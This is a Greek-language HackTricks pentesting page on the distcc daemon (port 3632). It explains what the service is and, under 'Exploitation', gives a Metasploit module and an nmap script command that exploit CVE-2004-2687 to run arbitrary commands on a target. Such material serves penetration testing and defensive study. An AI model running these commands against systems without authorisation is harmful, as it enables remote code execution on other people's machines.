mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 06:30:37 +00:00
41 lines
3.2 KiB
Markdown
41 lines
3.2 KiB
Markdown
<details>
|
||
|
||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||
|
||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||
|
||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||
|
||
</details>
|
||
|
||
|
||
# Βασικές Πληροφορίες
|
||
|
||
**Το Distcc** είναι ένα εργαλείο που βελτιώνει τη **διαδικασία συλλογής** χρησιμοποιώντας τη **ανενεργή επεξεργαστική ισχύ** άλλων υπολογιστών στο δίκτυο. Όταν το **distcc** είναι εγκατεστημένο σε μια μηχανή, αυτή η μηχανή είναι ικανή να διανέμει τις **εργασίες συλλογής** σε ένα άλλο σύστημα. Αυτό το σύστημα παραλήπτης πρέπει να εκτελεί το **δαίμονα distccd** και πρέπει να έχει εγκατεστημένο έναν **συμβατό μεταγλωττιστή** για να επεξεργαστεί τον απεσταλμένο κώδικα.
|
||
|
||
**Προεπιλεγμένη θύρα:** 3632
|
||
```
|
||
PORT STATE SERVICE
|
||
3632/tcp open distccd
|
||
```
|
||
# Εκμετάλλευση
|
||
|
||
Ελέγξτε αν είναι ευάλωτο στο **CVE-2004-2687** για να εκτελέσετε τυχαίο κώδικα:
|
||
```bash
|
||
msf5 > use exploit/unix/misc/distcc_exec
|
||
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
|
||
```
|
||
# Shodan
|
||
|
||
_Δεν νομίζω ότι το shodan ανιχνεύει αυτήν την υπηρεσία._
|
||
|
||
# Πόροι
|
||
|
||
* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
|
||
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
|
||
|
||
Δημοσίευση δημιουργημένη από **Álex B (@r1p)**
|